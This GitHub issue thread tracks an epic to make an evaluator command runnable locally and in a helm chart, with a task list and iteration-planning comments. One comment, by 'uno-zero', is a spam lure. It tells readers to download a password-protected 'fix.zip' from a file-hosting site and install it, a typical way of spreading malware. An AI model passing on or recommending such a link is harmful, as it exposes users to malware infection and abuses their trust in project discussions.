### ISSUE TITLE
[EPIC] Support running the evaluator 

### ISSUE THREAD

**Issue by yuvipanda** [2i2c-org/unnamed-thingity-thing#23]
We have an evaluator command (https://github.com/2i2c-org/unnamed-thingity-thing/blob/main/comptest/web/management/commands/evaluator.py) that constantly runs and actually does the evaluations themselves.

This should be runnable during:

1. Local install (documented via CONTRIBUTING.md)
2. In the helm chart (enabled by default)

```[tasklist]
- [ ] https://github.com/2i2c-org/unnamed-thingity-thing/issues/24
- [ ] https://github.com/2i2c-org/unnamed-thingity-thing/pull/56
- [ ] https://github.com/2i2c-org/unnamed-thingity-thing/issues/25
```

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by haroldcampbell** [comment]
The 5 points is because of there being only https://github.com/2i2c-org/unnamed-thingity-thing/issues/25 left to be completed

**Comment by haroldcampbell** [comment]
This is a stretch for iteration 24.
